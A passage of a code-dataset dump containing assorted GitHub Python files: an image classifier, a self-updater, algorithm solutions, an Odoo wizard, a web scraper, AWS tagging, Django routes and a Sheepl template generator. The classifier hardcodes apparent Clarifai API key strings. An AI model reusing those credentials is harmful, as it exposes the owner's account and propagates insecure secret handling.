'AngosturaBitters': 'Angostura Bitters'\n\n}\n\n\n\n\n\ndef run(image):\n app = ClarifaiApp(\"KiPgquABTE-kvueyDk2GoUrAlbJWGwCXlfrQ45pN\", \"hkAMvUIGzHH8hZNpPy1fyeC4sca2iS9SgTAUnwLe\")\n\n\n # get the general model\n\n model = app.models.get(\"alcohol\")\n image = ClImage(file_obj=image)\n pred = model.predict([image])\n pred = pred['outputs'][0]['data']['concepts'][0]\n pred['description'] = ingredientTypes[pred['name']]\n # print pred\n return pred\n\n\n\n\n","repo_name":"nigel-hall-codes/LiquorCabinet","sub_path":"cocktails/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24497984921","text":"import requests, re,os,shutil\n\n\ndef get_ver():\n html = requests.get(\"https://github.com/qwerttqq95/698SP_CL/blob/master/ver\").content\n q = re.compile(r'ver=\\d{6}')\n qw = q.findall(str(html))\n if qw is None:\n return None\n ver = qw[0][4:]\n print(\"The new is \" + ver)\n return ver\n\n\ndef loal_ver():\n f = open(\".\\\\attach\\\\ver\", 'r')\n text = f.read()\n q = re.compile(r'\\d{6}')\n ver = q.findall(text)\n if ver is None:\n return None\n return ver.pop()\n\n\ndef update(new_ver):\n try:\n r = requests.get(\"https://github.com/qwerttqq95/698SP_CL/raw/master/cmake-build-release/698SP_CL.exe\")\n with open(\".\\\\attach\\\\698SP_CL.exe\", \"wb\") as f:\n f.write(r.content)\n l = open(\".\\\\attach\\\\ver\", 'w')\n l.write(\"ver=\"+str(new_ver))\n print(\"下载完成...\")\n return True\n except:\n print(\"网络遇到问题\")\n return False\n\n\ndef delete():\n print(\"移除旧版...\")\n try:\n os.system('taskkill /f /im %s' % '698SP_CL.exe')\n os.remove(\"698SP_CL.exe\")\n finally:\n shutil.move(\".\\\\attach\\\\698SP_CL.exe\", \"./\")\n print(\"Update ok\")\n\n\ndef main():\n new_ver = get_ver()\n local_ver = loal_ver()\n if new_ver is None or local_ver is None:\n print(\"升级检测失败\")\n if new_ver == local_ver:\n print(\"无新版\")\n elif int(new_ver) > int(local_ver):\n print(\"发现新版,开始升级...\")\n if update(new_ver) is False:\n print(\"升级检测失败\")\n return\n delete()\n else:\n print(\"????\")\n\n\nif __name__ == '__main__':\n main()\n os.system(\"pause\")\n","repo_name":"qwerttqq95/698sp_cl_update_tool","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14296956159","text":"\"\"\"\n241. Different Ways to Add Parentheses\nhttps://leetcode.com/problems/different-ways-to-add-parentheses/\n\"\"\"\nclass Solution:\n def diffWaysToCompute(self, s, memo={}) -> List[int]:\n # DFS Backtrack\n # [0] Initialize a helper to calculate operation between 2 arguments\n # [1] if s is digit return [int(s)]\n # [2] if s is in a memoization (cache) then return cache\n # [3] for i in range(len(s)) if s[i] is an operation then split string s at i and run self.diffWaysToCompute on s[:i] and s[i+1:] and store as res1, res2 resp\n # [4] for j,k in res1, res2 append to result helper(j,k, s[i]).\n # Complexity n = len(s)\n # Bijection with balanced parentheses\n # Time: O(n*2^n) (or Catalan numbers) because at each number can open/close a parentheses\n # and splitting the string takes n time.\n # Space: O(2^n) worst to store results (catalan numbers)\n if s.isdigit():\n return [int(s)]\n if s in memo:\n return memo[s]\n res = []\n for i in range(len(s)):\n if s[i] in \"-+*\":\n res1 = self.diffWaysToCompute(s[:i])\n res2 = self.diffWaysToCompute(s[i+1:])\n for j in res1:\n for k in res2:\n res.append(self.helper(j, k, s[i]))\n memo[s] = res\n return res\n\n def helper(self, m, n, op):\n if op == \"+\":\n return m+n\n elif op == \"-\":\n return m-n\n else:\n return m*n\n","repo_name":"mathvolcano/leetcode","sub_path":"0241_diffWaysToCompute.py","file_name":"0241_diffWaysToCompute.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41894370936","text":"from odoo import _, api, exceptions, fields, models\n\n\nclass WizardCurrencyRevaluation(models.TransientModel):\n _name = \"wizard.reverse.currency.revaluation\"\n _description = \"Reverse Currency Revaluation Wizard\"\n\n @api.model\n def _get_default_journal_id(self):\n return self.env.company.currency_reval_journal_id\n\n revaluation_interval_start_date = fields.Date(\n string=\"Revaluation Start Date\",\n help=\"All entries revaluated on or after this date will be taken into account.\",\n )\n revaluation_interval_end_date = fields.Date(\n string=\"Revaluation End Date\",\n help=\"All entries revaluated on or before this date will be taken into account.\",\n )\n\n reverse_posting_date = fields.Date(\n string=\"Reverse Entries Accounting Date\",\n help=\"Date that will be assigned to the reverse entries created.\",\n )\n\n journal_id = fields.Many2one(\n comodel_name=\"account.journal\",\n string=\"Journal\",\n domain=[(\"type\", \"=\", \"general\")],\n help=\"You can set the default journal in company settings.\",\n required=True,\n default=lambda self: self._get_default_journal_id(),\n )\n\n entries_to_reverse_ids = fields.Many2many(\n comodel_name=\"account.move\",\n string=\"Entries to reverse\",\n help=\"The revaluated entries that will be reversed.\",\n )\n\n @api.onchange(\"revaluation_interval_start_date\", \"revaluation_interval_end_date\")\n def onchange_revaluation_interval_dates(self):\n self.ensure_one()\n account_move_model = self.env[\"account.move\"]\n company_id = self.journal_id.company_id.id or self.env.company.id\n domain = [\n (\"revaluation_to_reverse\", \"=\", True),\n (\"state\", \"=\", \"posted\"),\n (\"company_id\", \"=\", company_id),\n ]\n if self.revaluation_interval_start_date:\n domain += [(\"date\", \">=\", self.revaluation_interval_start_date)]\n if self.revaluation_interval_end_date:\n domain += [(\"date\", \"<=\", self.revaluation_interval_end_date)]\n entries = account_move_model.search(domain)\n final_entries = account_move_model\n for entry in entries:\n reverse_entry = account_move_model.search(\n [(\"reversed_entry_id\", \"=\", entry.id)], limit=1\n )\n if not reverse_entry:\n final_entries += entry\n self.entries_to_reverse_ids = final_entries\n\n def reverse_revaluate_currency(self):\n entries = self.entries_to_reverse_ids\n created_entries = entries._reverse_moves()\n vals = {\"revaluation_reversed\": True, \"revaluation_to_reverse\": False}\n if self.reverse_posting_date:\n vals.update({\"date\": self.reverse_posting_date})\n created_entries.write(vals)\n if self.journal_id.company_id.auto_post_entries:\n for entry in created_entries:\n entry.post()\n # Mark entries reversed as not to be reversed anymore\n entries.write({\"revaluation_to_reverse\": False})\n if created_entries:\n return {\n \"domain\": [(\"id\", \"in\", created_entries.ids)],\n \"name\": _(\"Reverse Revaluation Entries\"),\n \"view_mode\": \"tree,form\",\n \"auto_search\": True,\n \"res_model\": \"account.move\",\n \"view_id\": False,\n \"search_view_id\": False,\n \"type\": \"ir.actions.act_window\",\n }\n else:\n raise exceptions.Warning(_(\"No accounting entry has been posted.\"))\n","repo_name":"OCA/account-closing","sub_path":"account_multicurrency_revaluation/wizard/wizard_reverse_currency_revaluation.py","file_name":"wizard_reverse_currency_revaluation.py","file_ext":"py","file_size_in_byte":3580,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"61"} +{"seq_id":"23587051451","text":"from decimal import *\ngetcontext().prec = 10\nfrom math import pi\nfrom itertools import combinations\n\ndef ints(l):\n\treturn tuple([int(i) for i in l])\n\nT = int(input())\nfor test in range(T):\n\tn, k = ints(input().split())\n\tdim = [0] * n\n\tfor i in range(n):\n\t\tdim[i] = ints(input().split())\n\t#print(dim)\n\tdim = sorted(dim)[::-1]\n\t\n\tb = 0\n\tfor p2 in combinations({i for i in range(n)}, k):\n\t\tp = sorted(p2)\n\t\ts = dim[p[0]][0] * dim[p[0]][0]\n\t\tfor i in p:\n\t\t\ts += 2 * dim[i][0] * dim[i][1]\n\t\tif s > b:\n\t\t\tb = s\n\n\tprint(\"Case #\" + str(test+1) + \": \" + str(pi*b) )\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_209/730.py","file_name":"730.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43084262850","text":"import os, sys, re\nfrom PoP_level_parser import PoPISPTopo\npyPath = os.path.dirname(os.path.abspath(__file__))\nallFolders = os.listdir(pyPath)\nlinkFolders = [e for e in allFolders if re.match('[1-9]{1,}_[1-9]{1,}', e)]\n\nASes = []\nASlinks = []\nfor e in linkFolders:\n ASNum = e.split('_')\n if(int(ASNum[0]) == int(ASNum[1])):\n ASes.append(int(ASNum[0]))\n else:\n ASlinks.append((int(ASNum[0]), int(ASNum[1])))\nASes.sort()\nf = open('AS', 'w')\nfor a in ASes:\n f.write(str(a)+'\\n')\nf.close()\n# take only AS links between ASes that we have complete topology information\nASlinks = [l for l in ASlinks if l[0] in ASes and l[1] in ASes]\nASlinks.sort()\n\n\nnodesIdDict = {}\nf = open(\"nodes\")\nfor l in f:\n temp = l.split('|', 1)\n temp[1] = temp[1].strip('\\n')\n nodesIdDict[temp[1].replace('|',':')] = int(temp[0])\nf.close()\n\nWiserASlinks = []\nf = open('ingress_egress', 'w')\nlf = open('AS_links', 'w')\nplf = open('peering_links', 'w')\nfor a in ASes:\n peeringASes = [e[1] for e in ASlinks if e[0] == a]\n topo = PoPISPTopo(a)\n borderNodes = [n[\"name\"] for n in topo.g.vs.select(ASNum=a, border=True)]\n for p in peeringASes:\n # All the nodes that connected to p are considered as ingress nodes.\n peeringNodes = topo.g.vs.select(ASNum=p)\n ingress = []\n for n in peeringNodes:\n peeringlinkIdx = topo.g.incident(n.index)\n for l in peeringlinkIdx:\n if topo.g.es[l].source == n.index:\n if topo.g.vs[topo.g.es[l].target][\"name\"] not in ingress:\n ingress.append(topo.g.vs[topo.g.es[l].target][\"name\"]) \n plf.write(str(a)+','+str(p)+','+str(nodesIdDict[topo.g.vs[topo.g.es[l].target][\"name\"]])+','+str(nodesIdDict[topo.g.vs[topo.g.es[l].source][\"name\"]])+'\\n')\n else:\n if topo.g.vs[topo.g.es[l].source][\"name\"] not in ingress:\n ingress.append(topo.g.vs[topo.g.es[l].source][\"name\"])\n plf.write(str(a)+','+str(p)+','+str(nodesIdDict[topo.g.vs[topo.g.es[l].source][\"name\"]])+','+str(nodesIdDict[topo.g.vs[topo.g.es[l].target][\"name\"]])+'\\n')\n ingress = [nodesIdDict[n] for n in ingress]\n ingress.sort()\n '''\n # All the border nodes that connected to peering ASes except for p are considered as egress nodes.\n borderNodes = topo.g.vs.select(ASNum_notin=[a, p])\n egress = []\n for n in borderNodes:\n peeringlinkIdx = topo.g.incident(n.index)\n for l in peeringlinkIdx:\n if topo.g.es[l].source == n.index:\n if topo.g.vs[topo.g.es[l].target][\"name\"] not in egress:\n egress.append(topo.g.vs[topo.g.es[l].target][\"name\"]) \n else:\n if topo.g.vs[topo.g.es[l].source][\"name\"] not in egress:\n egress.append(topo.g.vs[topo.g.es[l].source][\"name\"])\n '''\n egress = [nodesIdDict[n] for n in borderNodes if nodesIdDict[n] not in ingress]\n egress.sort()\n if len(ingress) > 1 and len(egress) > 0:\n f.write(str(a)+'|'+str(p)+'|'+str(ingress).replace('[','{').replace(']','}')+'|'+str(egress).replace('[','{').replace(']','}')+'\\n')\n lf.write(str(a)+','+str(p)+'\\n')\n WiserASlinks.append((a,p))\nf.close()\nlf.close()\nplf.close()","repo_name":"wadaries/Rocketfule-ISP-Topology","sub_path":"PoP-level ISP maps/maps-n-paths/ingress_egress.py","file_name":"ingress_egress.py","file_ext":"py","file_size_in_byte":3374,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"35907138343","text":"import os\nimport sys\nfrom pathlib import Path\nfrom sys import platform\nimport subprocess\n\npath = Path(__file__).parent.absolute()\npath_dataset = os.path.join(path, \"datasets\")\npath = os.path.join(path, \"lib\")\nsys.path.append(path)\n\nfrom imports import *\n\n\n\"\"\"\nThis class calculates feature importance\n\nInput: \n\n\n\"\"\"\n\n\nclass explainx_pro():\n def __init__(self):\n super(explainx_pro, self).__init__()\n self.param = {}\n\n # is classification function?\n\n\n def rule_exploration(self, df, y, model):\n from apps.webapp.server.server import run\n y_pred = model.predict(df)\n target_names = list(set(y_pred))\n target_names = list(map(int, target_names))\n X = df.drop(columns=['y'], errors='ignore').values\n min_val = np.min(X, axis=0)\n max_val = np.max(X, axis=0)\n self.rule_output_data(cols=df.drop(columns=['y'], errors='ignore').columns.values.tolist(),\n data=X.tolist(),\n target_names=target_names,\n real_min=min_val.tolist(),\n real_max=max_val.tolist(),\n y_pred=y_pred.tolist(),\n y_gt=y)\n # print(os.system('python apps.webapp.server.py'))\n run()\n\n def get_random_string(self, length):\n letters = string.ascii_lowercase + string.ascii_uppercase\n result_str = ''.join(random.choice(letters) for i in range(length))\n return result_str\n\n def rule_output_data(self, cols, data, target_names, real_min, real_max, y_pred, y_gt):\n # data_name = self.get_random_string(5)\n filename = \"{}/apps/prepare/output/\".format(path) + \"user_defined\" + \"/test.json\"\n filename2 = \"{}/apps/webapp/data/\".format(path) + \"user_defined\" + \"/test.json\"\n\n directory = os.path.dirname(filename)\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n to_output = {}\n to_output['columns'] = cols\n to_output['data'] = data\n to_output['target_names'] = target_names\n to_output['real_min'] = real_min\n to_output['real_max'] = real_max\n to_output['y_pred'] = y_pred\n to_output['y_gt'] = y_gt\n with open(filename, 'w') as output:\n output.write(json.dumps(to_output))\n with open(filename2, 'w') as output:\n output.write(json.dumps(to_output))\n\n def dataset_boston(self):\n # load JS visualization code to notebook\n shap.initjs()\n X, y = shap.datasets.boston()\n return X, y\n\n def dataset_iris(self):\n # load JS visualization code to notebook\n shap.initjs()\n X, y = shap.datasets.iris()\n return X, y\n\n def dataset_heloc(self):\n dataset = pd.read_csv(path_dataset + \"/heloc_dataset.csv\")\n\n map_riskperformance = {\"RiskPerformance\": {\"Good\": 1, \"Bad\": 0}}\n dataset.replace(map_riskperformance, inplace=True)\n y = list(dataset[\"RiskPerformance\"])\n X = dataset.drop(\"RiskPerformance\", axis=1)\n return X, y\n\nexplainx_pro = explainx_pro()\n\n\n","repo_name":"explainX/Surrogate-Rule-Exploration-Method","sub_path":"explainx_pro.py","file_name":"explainx_pro.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"38073309265","text":"import sys\nin_put = sys.stdin.readline\n\n\na=int(in_put())\nc= [[0,0,0]]*a\n\nfor i in range(a):\n b,d =in_put().split()\n b= int(b)\n d= d.rstrip(\"\\n\")\n c[i]=b,i,d\n\nc.sort()\n\n\n\n\nfor j in range(a):\n print(c[j][0], c[j][2])\n","repo_name":"machi107/Baekjoon-Codes","sub_path":"Silver 5/10814 나이순 정렬.py","file_name":"10814 나이순 정렬.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24735724428","text":"\n# coding: utf-8\n\n# In[51]:\n\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n#sample website\nr=requests.get(\"https://pythonhow.com/real-estate/rock-springs-wy/LCWYROCKSPRINGS/\")\nc=r.content\n\n#reads though the website and looks for the important content we are looking for\nsoup = BeautifulSoup(c,\"html.parser\")\n\nall = soup.find_all(\"div\", {\"class\":\"propertyRow\"})\n\nall[0].find(\"h4\",{\"class\":\"propPrice\"}).text.replace(\"\\n\",\"\")\n\npage_nr=soup.find_all(\"a\",{\"class\":\"Page\"})[-1].text\nprint(page_nr)\n\n\n# In[52]:\n\n#script loops through every page of the sample website\n#reads though all of the property data and grabs the useful info we want\n#and adds it to an empty dictionary\n#address,locality, price, beds, baths and Area\n#and adds dictionary info into an empty list item to more easily create a dataframe object\nl=[]\nbase_url=\"https://www.pythonhow.com/real-estate/rock-springs-wy/LCWYROCKSPRINGS/t=0&s=\"\nfor page in range(0,int(page_nr)*10,10):\n print(base_url+str(page)+\".html\")\n r=requests.get(base_url+str(page)+\".html\")\n c=r.content\n soup=BeautifulSoup(c,\"html.parser\")\n print(soup.prettify())\n all = soup.find_all(\"div\", {\"class\":\"propertyRow\"})\n\n for item in all:\n d={}\n d[\"Address\"]=item.find_all(\"span\",{\"class\", \"propAddressCollapse\"})[0].text\n try:\n d[\"Locality\"]=item.find_all(\"span\",{\"class\", \"propAddressCollapse\"})[1].text\n except:\n d[\"locality\"]=None\n d[\"Price\"]=item.find(\"h4\",{\"class\",\"propPrice\"}).text.replace(\"\\n\",\"\").replace(\" \",\"\")\n try:\n d[\"Beds\"]=item.find(\"span\",{\"class\",\"infoBed\"}).find(\"b\").text\n except:\n d[\"Beds\"]=None\n\n try:\n d[\"Area\"]=item.find(\"span\",{\"class\",\"infoSqFt\"}).find(\"b\").text\n except:\n d[\"Area\"]=None\n try:\n d[\"Full Baths\"]=item.find(\"span\",{\"class\",\"infoValueFullBath\"}).find(\"b\").text\n except:\n d[\"Full Baths\"]=None\n try:\n d[\"Half Baths\"]=item.find(\"span\",{\"class\",\"infoValueHalfBath\"}).find(\"b\").text\n except:\n d[\"Half Baths\"]=None\n #try:\n #print(item.find(\"div\",{\"class\",\"propertyMLS\"}).text)\n #except:\n #print(None)\n for column_group in item.find_all(\"div\",{\"class\":\"columnGroup\"}):\n for feature_group, feature_name in zip(column_group.find_all(\"span\",{\"class\":\"featureGroup\"}), column_group.find_all(\"span\",{\"class\":\"featureName\"})):\n if \"Lot Size\" in feature_group.text:\n d[\"Lot Size\"]=feature_name.text\n l.append(d)\n\n\n# In[31]:\n\n\nl\n\n\n# In[53]:\n\n#uses pandas to create a dataframe object\nimport pandas\ndf=pandas.DataFrame(l)\n\n\n# In[46]:\n\n\ndf\n\n\n# In[54]:\n\n#creates a csv file from the dataframe\ndf.to_csv(\"Output.csv\")\n","repo_name":"peter-izzo/Web-Scraping","sub_path":"Century21.py","file_name":"Century21.py","file_ext":"py","file_size_in_byte":2914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72568030274","text":"# - Write a boto3 script that prints out all VPCs and Subnets\n# in your lab account.\n# - Then for each resource found (VPC and subnets), \n# attach a new AWS tag \"Project: Talent-Academy\" \n# where tag key is \"Project\" and tag value is \"Talent-Academy\"\n\nimport boto3\nclient =boto3.client('ec2',region_name='eu-central-1')\nvpcs = client.describe_vpcs()\nprint(vpcs)\nsubnets = client.describe_subnets()\nprint(subnets)\n\nfor vpc in vpcs['Vpcs']:\n vpc_id = vpc.get('VpcId',[])\n client.create_tags(\n Resources = [vpc_id],\n Tags = [\n {\n 'Key':'Project',\n 'Value':'Talent-Academy'\n },\n ]\n )\n\nfor subnet in subnets['Subnets']:\n subnet_id = vpc.get('SubnetId',[])\n client.create_tags(\n Resources = [subnet_id],\n Tags = [\n {\n 'Key':'Project',\n 'Value':'Talent-Academy'\n },\n ]\n )\n","repo_name":"KlToti/boto3","sub_path":"list_vpcs.py","file_name":"list_vpcs.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33444427274","text":"from django.contrib import admin\nfrom django.urls import path, include \nfrom listings.views import listing_list, listing_retrieve, listing_create, listing_update, listing_delete, listing_rent_list, listing_rent\nfrom .views import home_view \nfrom users.views import register, login_user, logout_user \n\nfrom django.conf import settings \nfrom django.conf.urls.static import static \n\n\nurlpatterns = [\n path('admin/logout/', logout_user),\n path('admin/', admin.site.urls),\n\n path('register/',register), \n path('login/',login_user),\n path('logout/', logout_user), \n\n\n path(\"home/\", home_view), \n path('listings/all/', listing_list),\n path('listings/single//',listing_retrieve ),\n path('listings/create/', listing_create), \n path('listings/single//update/', listing_update),\n path('listings/single//delete/', listing_delete), \n path('rent/all/', listing_rent_list), \n path('rent/single//', listing_rent), \n\n path('user/', include('users.urls')),\n path('staff/', include('staff.urls')) \n]\n\nurlpatterns += static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT) \n\n\n ","repo_name":"AibekMinbaev/great-estate","sub_path":"real_estate/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71766032515","text":"\"\"\"\n This is a template to create Class base\n Provides the stub code for a task\n\n\"\"\"\n\n__author__ = \"Matt Lorentzen @lorentzenman\"\n__license__ = \"MIT\"\n\n\nimport os\nimport sys\nimport textwrap\n\n\nclass CreateTemplate(object):\n \"\"\"\n Creates a template object with stub code\n \"\"\"\n\n def __init__(self, name):\n \"\"\"\n Takes the name from argparse and builds out a template for this\n \"\"\"\n self.name = name\n self.indent_space = ' '\n\n output_file_name = name + \".py\"\n with open(output_file_name, \"w\") as template_file:\n template_file.write(\n self.template_create_notes_header() +\n self.template_notes() +\n self.template_author_details() +\n self.template_modules() +\n self.template_class_cmd_declaration() +\n self.template_class_cmd_internals() +\n self.template_common_cmd_functions_new() +\n self.template_common_cmd_functions_cmd() +\n self.template_common_cmd_functions_complete() +\n self.template_helper_function_comment() +\n self.template_task_class_definition() +\n self.template_task_class_static_method_definition() +\n self.template_class_autoIT_block_definition() +\n self.template_class_autoIT_block_open() +\n self.template_class_autoIT_block_typing() +\n self.template_class_autoIT_block_close() +\n self.template_class_autoIT_create()\n )\n\n\n def template_create_notes_header(self):\n \"\"\"\n Formatter for notes file at the top of the task\n \"\"\"\n notes_header = \"\"\"\n \n # #######################################################################\n #\n # Task : {} Interaction\n #\n # #######################################################################\n \n \"\"\".format(self.name)\n\n return textwrap.dedent(notes_header)\n\n\n def template_notes(self):\n \"\"\"\n Builds out the notes at the top of the file\n \"\"\"\n \n class_notes = \"\"\"\n \\\"\"\"\n Creates the autoIT stub code to be passed into the master compile\n\n Takes a supplied text file for the Sheepl to type\n the master script will already define the typing speed as part of the master declarations\n\n ##############################################\n Add in Task Specific Notes Here\n ##############################################\n\n General Notes:\n The textwrap import is used to keep the AutoIT functions indented in code\n as this messes with the python code (back off OCD) when it's manually \n appearing to hang outside of the class declarations and also stops code collapse in IDEs.\n So when creating code specific to the AutoIT functions just use tabs to indent insitu\n and the textwarp library will strip all leading tabs from the beginning of the AutoIT block.\n Also uses textwrap.indent() to add indentation to 'Send' commands in text_typing_block()\n\n Conventions:\n Use 'AutoIT' in code comments and class names and 'autoIT' when using as part of variable names\n\n Modes:\n Interactive Mode\n This uses the task module assign task requirements\n Add additional CMD functions using do_\n Once all the arguments are complete\n build the do_complete function out by passing the arguments\n as keywords to the staticmethod of the task object\n .create_autoIT_block(self.csh, \n # add in other arguments\n # for object constructor\n # ---------------------> \n parm1=self.parm1_value,\n parm2=self.parm3_value\n # ---------------------> \n )\n Non-Interactive Profile\n This takes an input from the sheepl object\n and this creates a Profile() object. See profile.py\n \\\"\"\"\n \"\"\".format(self.name)\n\n return textwrap.dedent(class_notes)\n\n\n def template_author_details(self):\n \"\"\"\n Creates the author details\n \"\"\"\n\n author_notes = \"\"\"\n __author__ = \"\"\n __license__ = \"MIT\"\n \"\"\"\n\n return textwrap.dedent(author_notes) \n\n\n def template_modules(self):\n \"\"\"\n Imports common modules to be used across all templates\n \"\"\"\n\n module_imports = \"\"\"\n import cmd\n import sys\n import random\n import textwrap\n\n from utils.base.base_cmd_class import BaseCMD\n \"\"\"\n\n return textwrap.dedent(module_imports)\n\n\n # #######################################################################\n # Template CMD Definition\n # #######################################################################\n\n\n def template_class_cmd_declaration(self):\n \"\"\"\n Main Class Declaration\n \"\"\"\n\n class_declaration = \"\"\"\n\n # #######################################################################\n # Task CMD Class Module Loaded into Main Sheepl Console\n # #######################################################################\n\n\n class TaskConsole(BaseCMD):\n \"\"\"\n return textwrap.dedent(class_declaration)\n\n\n def template_class_cmd_internals(self):\n\n class_internals = \"\"\"\n \\\"\"\"\n Inherits from BaseCMD\n This parent class contains:\n : do_back > return to main menu\n : do_discard > discard current task\n : complete_task() > completes the task and resets trackers\n : check_task_started > checks to see task status\n \\\"\"\"\n \"\"\"\n \n class_internals += \"\"\"\n def __init__(self, csh, cl):\n\n # Calling super to inherit from the BaseCMD Class __init__\n super(TaskConsole, self).__init__(csh, cl)\n\n \"\"\"\n\n class_internals += \"\"\"\n # Override the defined task name\n self.taskname = '{}'\n # Overrides Base Class Prompt Setup \n self.baseprompt = cl.yellow('{} >: {} :> '.format(csh.name.lower()))\n self.prompt = self.baseprompt\n \"\"\".format(self.name, '{}', self.name.lower())\n\n class_internals += \"\"\"\n # creating my own \n self.introduction = \\\"\"\"\n ----------------------------------\n \"\"\"\n\n class_internals += self.indent_space + \"[!] {} Interaction.\".format(self.name)\n\n class_internals += \"\"\"\n Type help or ? to list commands.\n ----------------------------------\n 1: Start a new block using 'new'\n 2: ######### > add in steps\n 3: Complete the interaction using 'complete'\n \\\"\"\"\n print(textwrap.dedent(self.introduction))\n \n # ----------------------------------- >\n # Task Specific Variables\n # ----------------------------------- >\n\n # List to hold commands for current interaction\n # self.commands = []\n\n # Configures Subtasking\n # self.subtask_supported = True\n\n # empty subtask dictionary to hold assigned tasks\n # self.subtasks = \\{\\}\n \"\"\"\n\n return textwrap.indent(textwrap.dedent(class_internals), self.indent_space)\n\n\n def template_common_cmd_functions_new(self):\n \"\"\"\n Creates new common function\n \"\"\"\n\n task_common_functions_new = \"\"\"\n\n # --------------------------------------------------->\n # Task CMD Functions\n # --------------------------------------------------->\n\n def do_new(self, arg):\n \\\"\"\" \n This command creates a new Word document\n \\\"\"\"\n # Init tracking booleans\n # method from parent class BaseCMD\n # Inverse check to see if task has already started\n # Booleans are set in parent method\n \n # method from parent class BaseCMD\n if self.check_task_started() == False:\n print(\"[!] Starting : '{}_{}'\".format(str(self.csh.counter.current())))\n # OCD Line break\n print()\n self.prompt = self.cl.blue(\"[*] {}_{}\".format(str(self.csh.counter.current()))) + \"{}\" + self.baseprompt \n \"\"\".format(self.name, '{}', self.name, '{}','\\\\n')\n\n return textwrap.indent(textwrap.dedent(task_common_functions_new), self.indent_space)\n\n\n def template_common_cmd_functions_cmd(self):\n \"\"\"\n Common command loop\n \"\"\"\n\n task_common_function_commands = \"\"\"\n \n def do_cmd(self, command):\n \\\"\"\"\n First checks to see if a new {} Block has been started\n if so allows the command to be issued and then runs some checks\n or prompts to start a new interaction using 'new'\n Specify the command to run in the shell\n \\\"\"\"\n # Uncomment\n \\\"\"\"\n if command:\n if self.taskstarted == True: \n self.commands.append(command)\n else:\n if self.taskstarted == False:\n print(self.cl.red(\"[!] You need to start a new {} Interaction.\"))\n print(self.cl.red(\"[!] Start this with 'new' from the menu.\"))\n print(\"[!] You need to supply the command for typing\")\n pass\n \\\"\"\"\n \"\"\".format(self.name, self.name)\n\n return textwrap.indent(textwrap.dedent(task_common_function_commands), self.indent_space)\n\n\n def template_common_cmd_functions_complete(self):\n \"\"\"\n Creates complete common function\n \"\"\"\n\n task_common_functions_complete = \"\"\"\n \n def do_complete(self, arg):\n \\\"\"\"\n \n This command calls the constructor on the AutoITBlock\n with all the specific arguments\n >> Check the AutoIT constructor requirements\n \n setup create_internetexplorer for ease and clarity\n pass in unique contructor arguments for AutoITBlock\n \n \\\"\"\"\n\n # Call the static method in the task object\n if self.taskstarted:\n {}.create_autoIT_block(self.csh, \n # add in other arguments\n # for object constructor\n # ---------------------> \n ''\n # ---------------------> \n )\n\n # now reset the tracking values and prompt\n self.complete_task()\n\n \"\"\".format(self.name)\n \n return textwrap.indent(textwrap.dedent(task_common_functions_complete), self.indent_space)\n\n\n def template_helper_function_comment(self):\n \"\"\"\n Adds in the CMD util function comment space\n \"\"\"\n\n helper_function_comment = \"\"\"\n\n # --------------------------------------------------->\n # CMD Util Functions\n # --------------------------------------------------->\n\n \"\"\"\n\n return textwrap.indent(textwrap.dedent(helper_function_comment), self.indent_space)\n\n\n # #######################################################################\n # # # Template Task Definition\n # #######################################################################\n \n\n def template_task_class_definition(self):\n \"\"\" \n Creates the task subcode with inheritance\n \"\"\"\n\n template_task_class_definition = \"\"\"\n\n # #######################################################################\n # {} Class Definition\n # #######################################################################\n\n\n class {}:\n\n def __init__(self, csh, cl, **kwargs):\n self.__dict__.update(kwargs)\n self.csh = csh\n\n # Check if this task requires an AutoIT Specifc UDF\n # this gets declared here and then pushed into the master\n # if not then this can be deleted\n # Sheepl AutoIT include header list as part of the 'csh' object\n\n # self.autoIT_include_statement = \"#include \"\n\n # Check to make sure it's not already there, and if not add\n # if not self.autoIT_include_statement in csh.autoIT_UDF_includes:\n # csh.autoIT_UDF_includes.append(self.autoIT_include_statement)\n\n if csh.interactive == True:\n # create the task based sub console\n self.TaskConsole = TaskConsole(csh, cl)\n self.TaskConsole.cmdloop() \n \n \n\n # --------------------------------------------------->\n # End {} Constructor\n # --------------------------------------------------->\n \"\"\".format(self.name, self.name, self.name, self.name)\n\n return textwrap.dedent(template_task_class_definition)\n\n\n def template_task_class_static_method_definition(self):\n \"\"\" \n Creates the task subcode with inheritance\n \"\"\"\n\n template_task_class_static_method_definition = \"\"\"\n\n # --------------------------------------------------->\n # {} Static Method\n # --------------------------------------------------->\n\n \\\"\"\"\n These are all the elements that get passed into the \n @static method as keyword arguments\n Essentially, this is everything that needs to be passed\n to create the InternetExplorer object\n\n Parse the 'kwargs' dictionary for the arguments\n \\\"\"\"\n\n @staticmethod\n def create_autoIT_block(csh, **kwargs):\n \\\"\"\"\n Creates the AutoIT Script Block\n Note :\n Kwargs returns a dictionary\n do these values can be referenced\n by the keys directly\n \n This now creates an instance of the object with the correct\n counter tracker, and then appends as a task\n Note : add in additional constructor arguments as highlighted\n which get passed in from the 'kwargs' 